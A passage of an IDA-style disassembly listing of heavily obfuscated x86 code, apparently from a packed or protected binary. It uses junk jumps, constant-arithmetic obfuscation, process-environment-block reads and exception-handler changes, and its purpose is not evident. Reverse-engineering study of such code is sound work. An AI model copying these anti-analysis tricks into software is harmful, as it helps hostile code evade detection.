		mov	edi, eax
		pop	eax
		jmp	loc_48A32C
sub_48CD0A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D1F6

loc_48CD19:				; CODE XREF: sub_48D1F6:loc_48DA98j
		push	offset loc_48A714
		jmp	locret_48BDE9
; END OF FUNCTION CHUNK	FOR sub_48D1F6
; ---------------------------------------------------------------------------

loc_48CD23:				; CODE XREF: _3gijy9nr:0048C222j
		jno	near ptr dword_48893C+3Bh
		mov	edx, [eax]
		jmp	near ptr dword_489124+1Fh
; ---------------------------------------------------------------------------

loc_48CD30:				; CODE XREF: _3gijy9nr:0048B0FEj
		mov	esi, offset loc_48DE23
		jmp	loc_48911C
; ---------------------------------------------------------------------------
		push	offset sub_48D55D
		jmp	locret_48D550
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A343

loc_48CD45:				; CODE XREF: sub_48A343:loc_48D1EFj
		mov	eax, ebx
		call	sub_48C67D
; END OF FUNCTION CHUNK	FOR sub_48A343
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CD4E:				; CODE XREF: sub_48B609+2307j
		jmp	loc_48C44C
; END OF FUNCTION CHUNK	FOR sub_48B609
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_572. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		add	esi, 0A533E381h
		push	offset loc_48CB0D
		jmp	loc_48CFA6
; ---------------------------------------------------------------------------
		dd 0FF810000h, 0B11F50D1h, 0FFD7B1E9h
		db 0FFh, 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_570. PRESS KEYPAD	"+" TO EXPAND]
		dd 0ED69E900h
		db 2 dup(0FFh),	0
byte_48CD7B	db 81h			; DATA XREF: sub_48B609:loc_48A47Fo
		dd 714887F6h
		db 0D6h
byte_48CD81	db 85h,	0C6h, 0E8h	; DATA XREF: sub_48B609:loc_48C170o
		dd 0FFFFCB85h
		db 0
; ---------------------------------------------------------------------------

loc_48CD89:				; CODE XREF: _3gijy9nr:0048D4B5j
		jmp	loc_488B12
; ---------------------------------------------------------------------------
		align 10h
		jmp	loc_48DD39
; ---------------------------------------------------------------------------
		align 2
		xchg	ebx, [ebp+0]
		jmp	sub_48DFA5
; ---------------------------------------------------------------------------
		dw 8700h
; ---------------------------------------------------------------------------
		xor	al, 24h
		pop	esi
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_48A5E8
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48CDAE:				; CODE XREF: _3gijy9nr:loc_48C42Aj
		push	ebx
		pushf
		push	0BBF2294Ah
		pop	ebx
		and	ebx, 0DBBC6CE6h
		add	ebx, 64985DD0h
		jmp	near ptr dword_489974+5Fh
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CDC8:				; CODE XREF: sub_48B609+18D8j
		mov	byte ptr [edi],	87h
		pop	edi
		and	ebx, 5E1D9E93h
		jns	loc_48C763
		add	[eax-4Fh], ch
		pushf
		aas
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 2Ah

; =============== S U B	R O U T	I N E =======================================



sub_48CDDE	proc near		; CODE XREF: _3gijy9nr:loc_48A114p
		xchg	edx, [esp+0]
		pop	edx
		jnz	loc_488D95
		jmp	loc_4896AE
sub_48CDDE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	esi, [esp]
		pop	esi
		add	ebx, ebp
		add	ebx, 5D9A0133h
		mov	ebx, [ebx]
		xchg	ebx, [esp]
		jmp	loc_48D933
; ---------------------------------------------------------------------------
		align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_567. PRESS KEYPAD	"+" TO EXPAND]
		align 2
		dw 8199h
		dd 41D5ACF1h, 718F0FB4h, 33FFFFF9h
; ---------------------------------------------------------------------------
		cmc
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CE15:				; CODE XREF: sub_48B609:loc_48DBF9j
		sub	edi, 0D19A616Bh
		jnz	loc_48B69F
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 0FFFFBBE5h, 0E9F98500h, 0FFFFCD6Fh, 0CCE95300h
		db 0CCh
		db 2 dup(0FFh)
byte_48CE37	db 81h			; DATA XREF: sub_48B609:loc_489EECo
; ---------------------------------------------------------------------------
		retn	93C7h
; ---------------------------------------------------------------------------
		db 0Fh
		dd 0D257E8BDh, 0FFE9FFFFh, 4
; ---------------------------------------------------------------------------

loc_48CE48:				; CODE XREF: _3gijy9nr:0048A221j
		jmp	loc_48BCBD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CE4D:				; CODE XREF: sub_48B609:loc_48BA06j
		pop	eax
		xor	eax, 5B5E3BEh
		add	eax, 0D587F86Fh
		test	eax, 20h
		jmp	near ptr dword_488C00+0Bh
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CE67:				; CODE XREF: sub_48B609:loc_48DC87j
		pop	eax
; END OF FUNCTION CHUNK	FOR sub_48B609
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_541. PRESS KEYPAD	"+" TO EXPAND]
byte_48CE69	db 0C3h			; DATA XREF: sub_48A770+9r
		dw 0BD28h
		dd 8158708Ch, 0E3235CE8h, 0BF11E90Ch
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48CE7A:				; CODE XREF: _3gijy9nr:0048AEC6j
		or	edx, esi

loc_48CE7C:				; CODE XREF: _3gijy9nr:loc_48AEAFj
		call	loc_48B797

loc_48CE81:				; CODE XREF: _3gijy9nr:0048AE4Fj
		jmp	locret_48A55E
; ---------------------------------------------------------------------------
		dw 8100h
		dd 40F57FE5h
		db 0E1h

; =============== S U B	R O U T	I N E =======================================



sub_48CE8D	proc near		; CODE XREF: _3gijy9nr:0048929Bp

; FUNCTION CHUNK AT 0048B5F6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048DA0F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0048DCA4 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		xchg	edx, [esp+0]
		mov	edi, edx
		pop	edx
		mov	eax, [eax+68h]
		push	esi
		push	552C6262h
		jmp	loc_48DA0F
sub_48CE8D	endp

; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48CEA6:				; CODE XREF: _3gijy9nr:0048903Ej
		mov	ebx, ecx
		pop	ecx
		popf
		xchg	esi, [esp]
		jmp	loc_48BC08
; ---------------------------------------------------------------------------
		dw 8CE8h
		dd 0FFFFC4h
		db 0
; ---------------------------------------------------------------------------

loc_48CEB9:				; CODE XREF: _3gijy9nr:0048A9FEj
		jmp	loc_488B12
; ---------------------------------------------------------------------------
		align 10h
		dd 0FFEAD8E9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D36D

loc_48CEC5:				; CODE XREF: sub_48D36D+6j
		pop	ebx
		push	dword ptr [ebp-4]
		push	offset word_48C1C2
		jmp	nullsub_567
; END OF FUNCTION CHUNK	FOR sub_48D36D
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CED5:				; CODE XREF: sub_48B609+1A81j
		push	29731A5Bh
		pop	ebx
		push	edi
		mov	edi, offset loc_48D2E8
		jmp	loc_48CDC8
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dw 0F4E8h
; ---------------------------------------------------------------------------
		retf	0FFFFh
; ---------------------------------------------------------------------------
		align 4
		db 0, 99h

; =============== S U B	R O U T	I N E =======================================



sub_48CEEE	proc near		; CODE XREF: _3gijy9nr:0048B1C7p

; FUNCTION CHUNK AT 00489C1E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0048A967 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AB31 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048AFB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CAFF SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		shr	ebx, 0Eh
		jmp	loc_48A967
sub_48CEEE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_577. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A289

loc_48CEFB:				; CODE XREF: sub_48A289+3751j
		jmp	loc_48A565
; END OF FUNCTION CHUNK	FOR sub_48A289
; ---------------------------------------------------------------------------
		dd 3C870000h, 5FCF8B24h
; ---------------------------------------------------------------------------
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_48CF0B:				; CODE XREF: _3gijy9nr:0048DB35j
		jmp	loc_48A8F4
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48CF11:				; CODE XREF: _3gijy9nr:00489E21j
		jmp	loc_48C874
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4896F0

loc_48CF17:				; CODE XREF: _3gijy9nr:0048A1EBj
					; sub_4896F0:loc_48DFB7j
		pop	large dword ptr	fs:0
		add	esp, 4
		retn
; END OF FUNCTION CHUNK	FOR sub_4896F0
; ---------------------------------------------------------------------------
		align 4
		dd 0B6E9D2F7h, 0FFFFD2h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CF2D:				; CODE XREF: sub_48B609-F63j
		mov	es, bp
		add	eax, 0EEF039EDh
		mov	eax, [eax]
		push	offset sub_48ADE6
		jmp	nullsub_563
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48D704

loc_48CF42:				; CODE XREF: sub_48D704-2933j
		and	ebx, 6BBE9C11h
		call	sub_48DD48
		retn
; END OF FUNCTION CHUNK	FOR sub_48D704

; =============== S U B	R O U T	I N E =======================================



sub_48CF4E	proc near		; CODE XREF: _3gijy9nr:00489035p
		push	offset loc_48A00A
		jmp	nullsub_551
sub_48CF4E	endp

; ---------------------------------------------------------------------------
		db 0
byte_48CF59	db 3Ch,	0A4h, 0Fh	; DATA XREF: sub_48B609+1E5Ao
		dd 685h, 0BF4EE900h, 5700FFFFh,	48C082BFh, 0E805E900h
		dd 3487FFFFh, 243C8724h, 0E95FF78Bh, 0FFFFEB16h
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_587. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		dd 0EEE0800Fh, 875EFFFFh, 5B59240Ch, 0FFE0B4E9h, 0C38100FFh
		dd 0F847BE59h, 0FFD2AAE9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DF6B

loc_48CFA1:				; CODE XREF: sub_48DF6B:loc_48AB9Bj
		call	near ptr sub_48B609

loc_48CFA6:				; CODE XREF: _3gijy9nr:0048CD5Fj
		jmp	nullsub_549
; END OF FUNCTION CHUNK	FOR sub_48DF6B
; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_48CFAC	proc near		; CODE XREF: sub_48B609+D1p

; FUNCTION CHUNK AT 0048AE54 SIZE 00000017 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, large fs:30h
		push	ebp
		mov	ebp, ebx
		xchg	ebp, [esp+0]
		push	6CBD022Dh
		pop	ebx
		jmp	loc_48AE54
sub_48CFAC	endp

; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CFC9:				; CODE XREF: sub_48B609-4B7j
		jle	loc_48AD95
		jp	loc_48A12F
		xor	eax, 2F8307B0h
		rol	eax, 7
		jnb	loc_48CA9E
		add	[ecx+2E3CEFEFh], al
		add	[ebx+edx-0F9D163Bh], bl
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 2 dup(0FFh),	0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_556. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CFF5:				; CODE XREF: sub_48B609:loc_48B8DEj
		call	sub_48ABA0
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dw 0
		dd 0FFD964E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D003:				; CODE XREF: _3gijy9nr:loc_48D146j
		call	near ptr sub_48DAB9
		add	dh, al
		add	[edi+64EB8158h], al
		and	[ebx+15h], ch
		add	ebx, 35BDF8AFh
		push	1Ch
		and	al, 0E9h
		icebp
		mov	edx, 31E9FFFFh
		stc
; ---------------------------------------------------------------------------
		dd 0E900FFFFh, 0FFFFC906h, 800F0000h, 0FFFFC76Bh, 3D3E8h
		dd 0AEFE900h, 81680000h, 5859091Fh, 212DC081h, 0F081DE56h
		dd 0CF59AFCAh, 0FFD406E9h, 758B00FFh, 0D858E900h, 5D00FFFFh
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C3B4

loc_48D063:				; CODE XREF: sub_48C3B4+15j
		jmp	near ptr dword_4890D0+3Dh
; END OF FUNCTION CHUNK	FOR sub_48C3B4
; ---------------------------------------------------------------------------
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_562. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		jmp	loc_488B12
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48D530

loc_48D072:				; CODE XREF: sub_48D530-380Bj
		jmp	loc_489ED6
; END OF FUNCTION CHUNK	FOR sub_48D530
; ---------------------------------------------------------------------------
		align 4
		dd 0FFDB75E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D07F:				; CODE XREF: sub_48B609:loc_48A6F2j
		call	sub_48D4C3
		push	edx
		mov	edx, ebx
		xchg	edx, [esp+0Ch+var_C]
		jmp	loc_48CED5
; END OF FUNCTION CHUNK	FOR sub_48B609

; =============== S U B	R O U T	I N E =======================================



sub_48D08F	proc near

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0048CC06 SIZE 00000014 BYTES

		push	ebx
		mov	ebx, esi
		xchg	ebx, [esp+4+var_4]
		push	84EAB70h
		pop	esi
		jmp	loc_48CC06
sub_48D08F	endp

; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48D0A1:				; CODE XREF: _3gijy9nr:0048A151j
					; DATA XREF: _3gijy9nr:0048A84Fo
		or	edx, edx

loc_48D0A3:				; DATA XREF: sub_48DF6B-4B5Co
		jz	loc_48D6D5
		push	eax
		push	0F46C8C95h
		jmp	loc_48C65E
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D0B6:				; CODE XREF: sub_48B609+5DBj
		not	esi
		xchg	ecx, [esp+4+var_4]
		pop	ecx
		push	4893CBh
		jmp	near ptr dword_48A098+0Ah
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dw 8100h
		dd 0BAF260D3h, 0F2AEE99Fh, 5D00FFFFh, 8B241C87h, 0E95E5BCBh
		dd 0FFFFDECCh, 0BEEBE952h
		db 2 dup(0FFh),	0C3h
; ---------------------------------------------------------------------------

loc_48D0E7:				; DATA XREF: _3gijy9nr:loc_48D8A3o
		mov	byte ptr [esi],	2Ch
		pop	esi
		push	0C12B6978h
		jmp	loc_48C7DC
; ---------------------------------------------------------------------------
		db 2 dup(0)
byte_48D0F7	db 9			; DATA XREF: sub_48B609:loc_489A43o
; ---------------------------------------------------------------------------
		ror	byte ptr [edi],	cl
		test	[edi-1600000Bh], cl
		pmovmskb edi, mm7
		inc	dword ptr [eax]
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D530

loc_48D106:				; CODE XREF: sub_48D530-2646j
		jmp	loc_48B2AB
; END OF FUNCTION CHUNK	FOR sub_48D530
; ---------------------------------------------------------------------------
		align 4

loc_48D10C:				; CODE XREF: _3gijy9nr:0048B599j
		call	loc_48BE0A
		add	cl, ch
		test	ch, 0FFh
; ---------------------------------------------------------------------------
		db 0FFh
; ---------------------------------------------------------------------------

loc_48D117:				; CODE XREF: _3gijy9nr:00489D3Aj
		cmp	edi, 3BBE12F7h
		jmp	loc_48A9EB
; ---------------------------------------------------------------------------
		align 4
		mov	ecx, [ecx]
		pushf
		push	48BFABh
		jmp	loc_48C50D
; ---------------------------------------------------------------------------
		db 87h,	4, 24h
		dd 8B243487h, 0E9F58BC6h, 0FFFFC582h, 0C300h
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 2

loc_48D146:				; CODE XREF: _3gijy9nr:0048C295j
		jmp	loc_48D003
; ---------------------------------------------------------------------------

loc_48D14B:				; DATA XREF: _3gijy9nr:004894B2o
		add	eax, 0D74A8B74h
		mov	eax, [eax]
		popf
		mov	al, [eax]
		jmp	loc_489FB2
; ---------------------------------------------------------------------------
		db 87h
		dd 0EC8B241Ch, 87F88B57h, 0C18B243Ch, 0FFD294E8h, 0F2E900FFh
		dd 0FFFFD8h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_548. PRESS KEYPAD	"+" TO EXPAND]
		db 87h,	1Ch, 24h
		dd 0AC5BC38Bh, 31CD53C8h, 0C6CF68B6h, 86E90048h, 0FFFFD3h
		dd 0E900C300h, 0FFFFE7D9h
; ---------------------------------------------------------------------------

loc_48D194:				; CODE XREF: _3gijy9nr:0048B256j
		mov	dword ptr [ecx], 10001h
		lea	eax, loc_48AD73
		push	eax
		mov	eax, ebx
		xchg	eax, [esp]
		push	0ECD2B413h
		pop	ebx
		jmp	loc_48DCF6
; ---------------------------------------------------------------------------
byte_48D1B1	db 81h,	0C6h, 0D1h	; DATA XREF: sub_48B609:loc_48BD45o
		dd 0C703BE20h, 9AF56836h, 0B3E90048h, 0FFFFC7h,	2A870F00h
		dd 0FFFFFE5h, 0FFD2128Bh, 243C87FFh, 242C875Fh,	51E9CD8Bh
		dd 1, 0F5C6F700h, 0E98741A2h, 83Eh
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48D1EE:				; CODE XREF: _3gijy9nr:loc_48A20Bj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A343

loc_48D1EF:				; CODE XREF: sub_48A343+5j
		jmp	loc_48CD45
; END OF FUNCTION CHUNK	FOR sub_48A343
; ---------------------------------------------------------------------------
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48D1F6	proc near		; CODE XREF: sub_48B609:loc_48972Ep

; FUNCTION CHUNK AT 0048A1BD SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0048AE39 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048B07E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C4E4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048CD19 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048DA98 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		jb	loc_48C4E4
		lodsb
		call	sub_48A3DD

loc_48D206:				; CODE XREF: _3gijy9nr:0048D791j
		xor	eax, 4601A262h
		call	sub_48D391
		jle	near ptr dword_489284+7
		jmp	loc_48AE39
sub_48D1F6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 81DD1B00h, 0E97AE1F1h, 875E998h, 0C3000000h,	57108B00h
		dd 0A8695E68h, 0C0B1E982h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

locret_48D23A:				; CODE XREF: _3gijy9nr:loc_48DD34j
		retn
; ---------------------------------------------------------------------------

loc_48D23B:				; CODE XREF: _3gijy9nr:0048AE6Bj
		jmp	near ptr dword_48AA9C+1Dh
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D704

loc_48D242:				; CODE XREF: sub_48D704-4CA0j
		jmp	loc_48AC8B
; END OF FUNCTION CHUNK	FOR sub_48D704
; ---------------------------------------------------------------------------
		align 4
		pushf
		jmp	loc_48B55B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D24E:				; CODE XREF: sub_48B609+2995j
		ja	loc_48DFCB

loc_48D254:				; CODE XREF: sub_48B609+9B4j
		sub	edx, 0CCD0DE15h
		xor	edx, 0A4B28591h

loc_48D260:				; DATA XREF: _3gijy9nr:0048CA53o
		popf
		xor	eax, eax
		jmp	near ptr dword_489B70+2
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_489879

loc_48D268:				; CODE XREF: sub_489879+Cj
		mov	esi, [esi]
		push	489317h
		jmp	nullsub_572
; END OF FUNCTION CHUNK	FOR sub_489879
; ---------------------------------------------------------------------------
		dd 2ACD8100h, 0F1C2145h, 0FFEE4E85h, 0F36AE9FFh
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------

loc_48D287:				; CODE XREF: _3gijy9nr:0048C85Cj
		xchg	ebx, [esp]
		pop	ebx
		popf
		mov	al, [eax]
		sub	al, 99h
		jmp	loc_48DC81
; ---------------------------------------------------------------------------
		db 3, 0C3h, 0F7h
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 38h,	0A1h, 76h
		dd 0D1F9E947h, 0FFFFh, 8B242C87h, 0F0815DC5h, 0C8E65E6Dh
		dd 51E1C081h, 0E0817F87h, 590339DCh, 0FFFE51E9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; START	OF FUNCTION CHUNK FOR sub_48D95C

loc_48D2C2:				; CODE XREF: sub_48D95C-24F1j
		cmp	edi, 3291A214h
		jmp	loc_48BD99
; END OF FUNCTION CHUNK	FOR sub_48D95C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_565. PRESS KEYPAD	"+" TO EXPAND]
		dw 0C300h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D2D2:				; CODE XREF: _3gijy9nr:004898B8j
		jmp	loc_48AD86
; ---------------------------------------------------------------------------
		mov	ebx, [ecx]
		jmp	loc_48C461

; =============== S U B	R O U T	I N E =======================================



sub_48D2DE	proc near		; CODE XREF: sub_48B609:loc_48A266p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00489C61 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048A915 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	ebx, 3E9719EBh

loc_48D2E8:				; DATA XREF: sub_48B609+18D3o
		xchg	ebx, [esp+0]
		jmp	loc_48A915
sub_48D2DE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D2F2:				; CODE XREF: sub_48B609:loc_48C6DAj
		xor	ecx, 78AB8756h
		add	ecx, 0ED0DC37h
		jmp	loc_489733
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		dd 0FFBDEDE8h, 0B550E9FFh, 0FFFFh, 810000C3h, 409497D0h
		dd 340E93Ch, 0
		dd 3C87E803h, 24148724h, 0E85AFA8Bh, 0FFFFF670h, 0FFEA1CE9h
		db 0FFh, 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_579. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_48D338:				; CODE XREF: _3gijy9nr:0048CAE5j
		jmp	near ptr dword_48C2C8+1Bh
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 0FFFFFC09h, 3F340000h, 243C879Dh, 38689C52h,	0E9434A82h
		dd 0FFFFB8ACh
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D35A:				; CODE XREF: sub_48B609+146j
		jge	loc_489065
		sbb	edi, 6DA2D52Bh
		jmp	loc_48905D
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48D36D	proc near		; CODE XREF: sub_48B609+636p

; FUNCTION CHUNK AT 0048CEC5 SIZE 0000000E BYTES

		xchg	ebx, [esp+0]

loc_48D370:				; CODE XREF: sub_48B609+1A8j
		rol	ebx, 0Ah
		jmp	loc_48CEC5
sub_48D36D	endp

; ---------------------------------------------------------------------------
		dd 3C870000h, 0F0815F24h, 0F52742BCh, 6852C503h, 0BB28920Ch
		dd 0FFF394E9h
		db 0FFh

; =============== S U B	R O U T	I N E =======================================



sub_48D391	proc near		; CODE XREF: sub_48D1F6+16p

; FUNCTION CHUNK AT 0048A55F SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	eax, ebp
		push	esi
		push	0CA39D9D5h
		pop	esi
		jmp	loc_48A55F
sub_48D391	endp

; ---------------------------------------------------------------------------
		align 4
		dd 0E9C78B00h, 0FFFFCAEAh, 0C798C0Fh
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D3B2:				; CODE XREF: sub_48B609:loc_48AE82p
		xchg	edi, [esp]
		pop	edi
		lea	eax, nullsub_573
		call	sub_48A8B8
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 0FFFFEC14h, 8008B00h, 7B840FC0h, 0E8FFFFBFh,	0A0Ah
		dd 40E90000h, 0FFFFF2h
; ---------------------------------------------------------------------------

loc_48D3E0:				; CODE XREF: _3gijy9nr:00489763j
		jmp	locret_48D984
; ---------------------------------------------------------------------------
		rol	ebp, 8
		cdq
		jmp	sub_48A928
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48D3EF:				; CODE XREF: _3gijy9nr:0048DDD7j
		add	esi, 0D0243362h
		and	eax, 0E9243487h
		outsb
		cld
; ---------------------------------------------------------------------------
		dd 0FFFFh, 3B9E9h, 0E9000000h, 0FFFFFB0Bh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D40C:				; CODE XREF: sub_48B609:loc_48D551j
		mov	eax, large fs:18h
		jmp	loc_48A2BA
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------

loc_48D418:				; CODE XREF: sub_48D530-265Fp
		xchg	esi, [esp]
		xchg	eax, [esp]
		mov	esi, eax
		pop	eax
		xor	eax, 1D74CC15h
		call	sub_48C7B1
; ---------------------------------------------------------------------------
		dd 36E90000h, 0FFFFFAh,	0D3E9h
		db 0
byte_48D439	db 56h,	0BEh, 0Fh	; DATA XREF: sub_48ADD6:loc_48DB3Ao
		dd 0E90048DDh, 0FFFFE182h, 0FCF08100h, 0E863A998h, 0FFFFB452h
		dd 0B3F0E900h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D457:				; CODE XREF: sub_48B609-F27j
		add	edx, ebp
		add	edx, 304ECE3Dh
		mov	edx, [edx]
		imul	byte ptr [edx]
		push	offset byte_48CF59
		jmp	nullsub_553
; ---------------------------------------------------------------------------

loc_48D46D:				; CODE XREF: sub_48B609+262j
		add	ebx, 4088D569h
		jmp	near ptr dword_488DA8+29h
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dd 0E9580000h, 0FFFFE053h
; ---------------------------------------------------------------------------

loc_48D480:				; CODE XREF: _3gijy9nr:0048A35Dj
		push	esi
		push	883070D5h
		pop	esi
		sub	esi, 2A0B53B6h
		add	esi, 0EEF7C045h
		jmp	loc_48B9B1
; ---------------------------------------------------------------------------
dword_48D498	dd 87F98B57h, 8AE8243Ch, 0FFFFD7h ; DATA XREF: sub_48C8EE+7o
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48D4A4:				; CODE XREF: sub_48B609+315j
		jmp	nullsub_569
; END OF FUNCTION CHUNK	FOR sub_48B609
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_584. PRESS KEYPAD	"+" TO EXPAND]
		align 4

loc_48D4AC:				; CODE XREF: _3gijy9nr:0048B592j
		jmp	loc_48B1C1
; ---------------------------------------------------------------------------

loc_48D4B1:				; CODE XREF: _3gijy9nr:00489D6Aj
					; _3gijy9nr:loc_48C804j
		popf
		db	36h
		sbb	al, 24h
		jmp	loc_48CD89
; ---------------------------------------------------------------------------
		dw 0E900h
		dd 0FFFFD7C8h
		db 0, 0C3h, 0

; =============== S U B	R O U T	I N E =======================================



sub_48D4C3	proc near		; CODE XREF: sub_48B609:loc_48D07Fp

; FUNCTION CHUNK AT 00489407 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0048C8E3 SIZE 0000000B BYTES

		mov	eax, large fs:30h
		add	eax, 522F2A4Fh
